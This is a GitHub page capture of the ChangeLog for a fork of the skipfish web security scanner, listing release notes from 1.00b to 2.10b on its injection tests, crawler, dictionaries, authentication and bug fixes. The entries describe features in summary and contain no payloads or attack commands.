forked from spinkham/skipfish
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathChangeLog
780 lines (476 loc) · 18.3 KB
/
ChangeLog
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
Version 2.10b:
- Updated HTML tags and attributes that are checked for URL XSS
injections to also include a few HTML5 specific ones
- Updated test and description for semi-colon injection in HTML meta
refresh tags (this is IE6 specific)
- Relaxed HTML parsing a bit to allow spaces between HTML tag attributes
and their values (e.g. "foo =bar").
- Major update of LFI tests by adding more dynamic tests (double
encoding, dynamic amount of ../'s for web.xml). The total amount of
tests for this vulnerability is now 40 per injection point.
- The RFI test is now a separate test and no longer requires special
compile options. The default RFI URL and it's payload check are
still defined in src/config.h.
- Using the --flush-to-disk flag will cause requests and responses
to be flushed to disk which reduces the memory footprint. (especially
noticable in large scans)
- Fixed a bug where in some conditions (e.g. a page looks similar to
another) links were not scraped from responses which lead to links
to be missed (thanks to Anurag Chaurasia for reporting)
- Added configuration file support with the --config flag. In
config/example.conf you can find flags and examples.
- Several signature keyword enhancements have been made. Most
significant are the "header" keyword, which allows header matching
and the "depend" keyword which allows signature chaining.
- Fixed basic authentication which was broken per 2.08b. Cheers to
Michael Stevens for reporting.
- Fixed -k scheduling where 1:0:0 would count as a second in stead of
an hour (also visa versa). Cheers to Claudio Criscione for reporting.
- Small fix to compile time warnings
Version 2.09b:
- Fixed a crash that could be triggered during 404 fingerprint failures
- Signature IDs for detected issues are now stored in the report
JSON files.
- Added mod_status, mod_info, MySQL dump, phpMyAdmin SQL dump and
robots.txt signatures.
- Improved the Flash and Silverlight crossdomain policy signatures to
only warn about them when they use wildcards.
Version 2.08b:
- Added Host header XSS testing.
- Added HTML encoding XSS tests to detect scenarios where our
injection string ends up in an attributes that execute HTML encoded
Javascript. For example: onclick.
- Bruteforcing is now disabled for URLs that gave a directory listing.
- Added subject alternate name checking for SSL certificates (cheers
to Matt Caroll for his feedback)
- Added signature matching (see doc/signatures.txt) which means a lot
of the content based issues are no longer hardcoded.
- Added active XSSI test. The passive XSSI stays (for now) but this
active check is more acurate and will remove issues detected by the
passive one if they cannot be confirmed. This reduces false positives
- Added HTML tag XSS test which triggers when our payload is used
as a tag attribute value but without quotes (courtesy of wavsep).
- Added javascript: scheme XSS testing (courtesy of wavsep).
- Added form based authentication. During these authenticated
scans, skipfish will check if the session has ended and re-authenticates
if necessary.
- Fixed a bug where in slow scans the console output could mess up
due to the high(er) refresh rate.
- Fixed a bug where a missed response during the injection tests could
result in a crash. (courtesy of Sebastian Roschke)
- Restructure the source package a bit by adding a src/, doc/ and
tools/ directory.
Version 2.07b:
--------------
- A bugfix to fprint_response() will help reduce false positives that
could occur for differential tests (i.e. the query and shell injection
tests)
- We now suppress implicit cache warnings when dealing with 302, 303 and 307
redirects.
- Added --no-checks which allows a scan to be run without any injection
tests. This still allows bruteforcing and combines well with the
new ability to load URLs from previous scan results.
- We can now parse the pivots.txt, which can be found in the output
directory of older scans. All URLs will be loaded which seriously
speeds up recurring scans.
- Directory bruteforcing now includes a content negotiation trick where
a using a fake mime in the Accept: header will cause some servers to
propose us files via a 406 response.
- A horrible bug fix which caused instable pages not be marked
as such. The result: false positives.
Version 2.06b:
--------------
- Crawler update which gives more control over the injection test
scheduling. This comes with the --checks and --checks-toggle
flags to display and enable/disable checks.
- Pages where the response varies are no longer completely
discarded. Instead now we only disable tests that require stability
which increases scan coverage.
- Split the traversal and disclosure test to increase coverage:
traversal checks require stable pages, the disclosure checks can be
performed on all.
- Updated dictionaries and converted them to use the dictionary
optimisations we introduced in 2.03b
- Fixed offline report viewing (thanks to Sebastian Roschke)
- Added NULL byte file disclosure tests
- Added JSP inclusion error check to analyse.c
- Added XSS injection tests for cookies
- Directory listings are now reported as individual (info-type) issues
- Added warning in case the negotiated SSL cipher turns out to be a
weak one (leaving the cipher enumeration to network scanners)
- Added experimental -v flag which can be used to enable (limited)
runtime reporting. This output is written to stderr and should be
redirected to a file, unless you use the -u flag.
- The man page has been rewritten and now includes detailed descriptions
and examples.
- A whole bunch of small bug fixes
Version 2.05b:
--------------
- Fixed a NULL pointer crash when adding "callback" tests to JavaScript
URLs that have a parameter with no value.
- Bug fix in the redirect callback which expected 2 responses but
since 2.04b actually should process 4.
Version 2.04b:
--------------
- Option -V eliminated in favor of -W / -S.
- Option -l added to limit the maximum requests per second (contributed by Sebastian Roschke)
- Option -k added to limit the maximum duration of a scan (contributed by Sebastian Roschke)
- Support for #ro, -W-; related documentation changes.
- HTTPS -> HTTP form detection.
- Added more diverse traversal and file disclosure tests (including file:// scheme tests)
- Improved injection detection in <script> sections, where a ' or "
is all we need to inject js code.
- Added check to see if our injection strings end up server Set-Cookie,
Set-Cookie2 and Content-Type reponse headers
- URLs that give us a Javascript response are now tested with a
"callback=" parameter to find JSONP issues.
- Fixed "response varies" bug in 404 detection where a stable page would be marked unstable.
- Bugfix to es / eg handling in dictionaries.
Version 2.03b:
--------------
- Fixed a minor glitch in form parsing in analysis.c, courtesy of
Niloufar Pahlevan Sadegh.
- Two database.c bugfixes to wordlist handler, courtesy of Shaojie Wang.
Version 2.02b:
--------------
- Fixed a minor NULL pointer crash in -Y mode.
Version 2.01b:
--------------
- Substantial improvement to SQL injection checks.
- Improvements to directory traversal checks (courtesy of Niels Heinen).
- Fix to numerical brute-force logic.
- Major improvement to directory brute force: much better
duplicate elimination in some webserver configurations.
- Added a check for attacker-controlled prefixes on inline responses.
This currently leads to UTF-7 BOM XSS, Flash, Java attacks (thanks to
Niels Heinen).
Version 2.00b:
--------------
- Minor bug fix to path parsing to avoid problems with /.$foo/,
- Improved PHP error detection (courtesy of Niels Heinen),
- Improved dictionary logic (courtesy of Niels Heinen) and new
documentation of the same,
- Improved support for file.ext keywords in the dictionary,
- Fixed missing content_checks() in unknown_check_callback()
(courtesy of Niels Heinen),
- Improved an oversight in dictionary case sensitivity,
- Improved pivots.txt data,
- Support for supplementary read-only dictionaries (-W +dict),
- Change to directory detection to work around a certain sneaky
server behavior.
- TODO: Revise dictionaries!!!
Version 1.94b:
--------------
- Proxy support! Currently only works for HTTP, put behind #ifdef
PROXY_SUPPORT.
- Change to prefix() and change_prefix() macros to limit the risk of bugs.
Version 1.93b:
--------------
- Major fix to URL XSS detection logic (courtesy of Niels Heinen).
Version 1.92b:
--------------
- Reading starting URLs from file is now supported (@ prefix).
Version 1.90b / 1.91b:
----------------------
- Minor fix to pivots.txt.
Version 1.89b:
--------------
- Skipfish now saves all discovered URLs in a single file for third-party
tools: pivots.txt.
Version 1.88b:
--------------
- Dictionary improvements, contd.
Version 1.87b:
--------------
- Dictionary improvements.
Version 1.86b:
--------------
- HTTP auth header value changed from "basic" to "Basic" to
compensate for picky web frameworks.
- Minor fix to time display code.
Version 1.85b:
--------------
- Minor refinements to the content analysis module.
Version 1.84b:
--------------
- Option -S removed.
Version 1.83b:
--------------
- Minor fix to -e behavior.
Version 1.82b:
--------------
- NULL pointer in is_javascript() fixed.
Version 1.81b:
--------------
- Fix to numerical SQL injection detector logic.
Version 1.80b:
--------------
- New option (-e) to delete binary payloads.
- -J option is now obsolete (on by default).
Version 1.79b:
--------------
- Improvement to directory listing detector.
Version 1.78b:
--------------
- Fix to -J logic.
Version 1.77b:
--------------
- Further minor documentation and presentation tweaks.
Version 1.76b:
--------------
- Major clean-up of dictionary instructions.
Version 1.75b:
--------------
- iPhone U-A support added.
Version 1.74b:
--------------
- Non-HTTPS password form analysis added.
Version 1.73b:
--------------
- Silence some pointless compiler warnings on newer systems.
Version 1.72b:
--------------
- Minor beautification stuff.
Version 1.71b:
--------------
- Child signatures now exposed in the report,
- Improvements to duplicate node detection,
- sfscandiff tool added to compare reports.
Version 1.70b:
--------------
- Improved SQL syntax detection slightly to avoid phone number FP.
- Removed obsolete allocator flags.
Version 1.69b:
--------------
- Minor improvements to parameter encoding, User-Agent controls.
Version 1.68b:
--------------
- Password detector improvement.
Version 1.67b:
--------------
- Improved directory detection logic.
- Some dictionary updates.
Version 1.65b:
--------------
- Relaxed MIME matching on claimed CSS/JS that fails MIME sniffing logic.
- Proper detection of @media in CSS.
Version 1.64b:
--------------
- Changed param injection check slightly to work better with WordPress.
Version 1.62b:
--------------
- Further refinements to content classifier.
Version 1.60b:
--------------
- Minor sniffer fix to better handle CSV file checks.
Version 1.59b:
--------------
- Fixed several file POI checks that depended on MIME information.
Version 1.58b:
--------------
- Descendant limit checks added.
Version 1.57b:
--------------
- Splash screen added (grr).
Version 1.56b:
--------------
- Path-based injection attacks now also carried out on file / pathinfo nodes.
- Minor bugfix to try_list logic.
- Slight tweak to form parsing to properly handle specified but empty action=
strings.
Version 1.55b:
--------------
- Improved 404 directory no-parse checks.
Version 1.54b:
--------------
- Improved loop detector on mappings that only look at the last path segment.
Version 1.53b:
--------------
- Slight improvement to JSON discriminator.
Version 1.52b:
--------------
- Fixed HTTP read loop after 1.48b.
Version 1.51b:
--------------
- abort() instead of exit() in several places.
- Cleaned up mem leak, incorrect use of ck_free() in IDN handling.
Version 1.49b:
--------------
- Minor improvement to the allocator,
- Several directory listing signatures added.
Version 1.48b:
--------------
- A fix to SSL handling to avoid mystery fetch failures when
talking to certain servers.
Version 1.47b:
--------------
- Minor tweaks around compiler warnings, etc.
- Versioned directories now in use.
- malloc_usable_size ditched in favor of djm's trick.
- Minor performance tweaks as suggested by Jeff Johnson.
Version 1.46b:
--------------
- Security: fixed a potential read past EOB in scrape_response() on
zero-sized payloads. Credit to Jeff Johnson.
- Removed redundant fdopen() in dictionary management,
Version 1.45b:
--------------
- Minor aesthetic tweaks to the report viewer.
- Report subnode ordering now a bit saner.
Version 1.44b:
--------------
- Significant improvement to numerical SQL injection detector.
- Minor tweak to SQL message detection rules.
Version 1.43b:
--------------
- Improvement to reduce the likelihood of crawl loops: do not
extract links if current page identical to parent.
Version 1.42b:
--------------
- Fix to SQL injection detection with empty parameters.
Version 1.41b:
--------------
- Logic change: if response varies, directory brute force is
also skipped.
Version 1.40b:
--------------
- Command-line option not to descend into 5xx directories.
Version 1.39b:
--------------
- Option to override 'Range' header from the command line.
Version 1.38b:
--------------
- Decompression now honors user-specified size limits more reliably.
- Retry logic corrected to account for certain Oracle servers.
- Terminal I/O fix for debug mode.
Version 1.37b:
--------------
- NULL ptr with -F fixed.
Version 1.36b:
--------------
- Command-line support for parameters that should not be fuzzed.
- In-flight URLs can be previewed by hitting 'return'.
Version 1.35b:
--------------
- Several new form autocomplete rules.
Version 1.34b:
--------------
- A small tweak to file / dir discriminator logic to accommodate
quirky frameworks.
Version 1.33b:
--------------
- New SQL error signature added.
- Improved tolerance for tabs in text page detector.
Version 1.32b:
--------------
- A minor fix for embedded URL auth detection.
Version 1.31b:
--------------
- Compilation with USE_COLOR commented out now works as expected.
- Fix to detect <frame> tags.
Version 1.30b:
--------------
- Support for the (rare) <button> tag in forms.
- Fixed compiler warning on some platforms.
Version 1.29b:
--------------
- Forms with no action= URL are now handled correctly.
- New option (-u) to suppress realtime info,
- Destination host displayed on stats screen.
Version 1.27b:
--------------
- Tweak to CFLAGS ordering to always enforce FORTIFY_SOURCE.
- Man page added.
Version 1.26b:
--------------
- phtml added to the dictionary.
- Yet another workaround for MALLOC_CHECK_. Grr.
Version 1.25b:
--------------
- A limit on the number of identically named path elements added. This
is a last-resort check against endless recursion (e.g., for 'subdir'
-> '.' symlinks).
Version 1.24b:
--------------
- XSS detection now accounts for commented out text.
Version 1.23b:
--------------
- A minor improvement to XHTML detection.
- HTML vs XHTML mismatches no longer trigger a warning.
Version 1.22b:
--------------
- URL parser now accounts for its own \.\ injection pattern.
Version 1.19b:
--------------
- New ODBC POI added.
- Apache config file detection tightened up.
Version 1.18b:
--------------
- Fix a potential NULL ptr deref with malformed Set-Cookie.
- Another last-resort HTML detection pattern added.
Version 1.17b:
--------------
- JS detector refined not to trigger on certain text/plain inputs.
Version 1.16b:
--------------
- Fixed a typo introduced in 1.16 to index.html (d'oh).
- Further refinements to Makefile CFLAGS / LIBS / LDFLAGS to keep package
maintainers happy.
Version 1.15b:
--------------
- Better documentation on why certain issues are not reported by skipfish.
- Another minor tweak to improve path mapping detection logic.
Version 1.14b:
--------------
- Several new wordlist entries, courtesy of Glastopf Honeypot:
http://glastopf.org/index.php
- A tweak to path mapping detection logic to detect certain path mappings
that may result in crawl loops.
- Makefile now honors external LDFLAGS, CFLAGS.
- Some more documentation tweaks and rewrites.
- PUT detection logic added.
Version 1.13b:
--------------
- Improved password, file form detection slightly.
Version 1.12b:
--------------
- Improved visibility of the KnownIssues page (reports, Makefile).
- The location of assets/ directory is now configurable.
Version 1.11b:
--------------
- SIGWINCH support: you can now cleanly resize your window while scanning.
- Typo in report category name fixed.
- Terminal color fix (for users with non-standard color themes).
- Corrected icons license (GPL -> LGPL).
- Fixed a typo in -b ffox headers.
- Fixed a potential NULL ptr deref when doing form parsing.
Version 1.10b:
--------------
- Fix to extensions-only.wl (some bad keywords removed).
Version 1.09b:
--------------
- Fix for a potential NULL ptr deref in probabilistic scan mode (<100%).
Version 1.08b:
--------------
- A minor improvement to XHTML / XML detection.
Version 1.07b:
--------------
- Several build fixes for FreeBSD, MacOS X (-I, -L paths).
Version 1.06b:
--------------
- Minor documentation updates, typos fixed, etc.
Version 1.05b:
--------------
- A more robust workaround for FORTIFY_SOURCE (MacOS X).
Version 1.04b:
--------------
- Workaround for *BSD systems with malloc J or Z options set by default
(0x5a5a5a5a deref after realloc()).
- A minor tweak to reject certain not-quite-URLs extracted from JS.
Version 1.01b:
--------------
- Workaround for a glitch in FORTIFY_SOURCE on Linux (causing crash
on startup).
Version 1.00b:
--------------
- Initial public release.